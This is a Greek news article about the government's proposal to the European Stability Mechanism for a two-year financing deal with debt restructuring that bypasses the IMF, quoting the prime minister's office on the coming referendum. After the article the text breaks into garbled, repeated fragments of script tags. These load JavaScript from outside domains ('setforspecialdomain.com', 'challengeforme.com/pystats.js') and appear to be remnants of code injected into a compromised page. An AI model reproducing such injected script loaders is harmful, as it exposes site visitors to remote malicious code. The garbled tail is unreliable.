Έκτακτο: Πρόταση της κυβέρνησης προς τον ESM για «παράκαμψη» του ΔΝΤ

maximou

Πρόταση προς τον Ευρωπαϊκό Μηχανισμό Σταθερότητας (ESM) για «παράκαμψη» του ΔΝΤ, αλλά και για την πλήρη κάλυψη των χρηματοδοτικών αναγκών της Ελλάδας κατέθεσε η κυβέρνηση ζητώντας και αναδιάρθρωση χρέους, σε μία τελευταία προσπάθεια να επιτευχθεί -ή να φανεί ότι επιτυγχάνεται- συμφωνία.

Η κυβέρνηση επιχειρεί να καθησυχάσει τους πολίτες πως παραμένει στο τραπέζι της διαπραγμάτευσης και δεν οδεύει προς ρήξη. «Από την πρώτη στιγμή είχαμε ξεκαθαρίσει πως η απόφαση για διεξαγωγή δημοψηφίσματος δεν αποτελεί το τέλος αλλά η συνέχεια της διαπραγμάτευσης με καλύτερους όρους για τoν ελληνικό λαό. Η Ελλάδα παραμένει στο τραπέζι της διαπραγμάτευσης», τονίζει χαρακτηριστικά το Μέγαρο Μαξίμου, ανοίγοντας τα χαρτιά του για την πρόταση που κατέθεσε η κυβέρνηση στους θεσμούς: «Η ελληνική κυβέρνηση πρότεινε σήμερα διετή συμφωνία με τον Ευρωπαϊκό Μηχανισμό Σταθερότητας (ESM) για την πλήρη κάλυψη των χρηματοδοτικών της αναγκών και με ταυτόχρονη αναδιάρθρωση του χρέους.

Η ελληνική κυβέρνηση μέχρι τέλους θα διεκδικήσει βιώσιμη συμφωνία εντός του ευρώ. Αυτό θα είναι και το μήνυμα του ΟΧΙ σε μια κακή συμφωνία στο δημοψήφισμα της Κυριακής», καταλήγει η ανακοίνωση του πρωθυπουργικού γραφείου.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >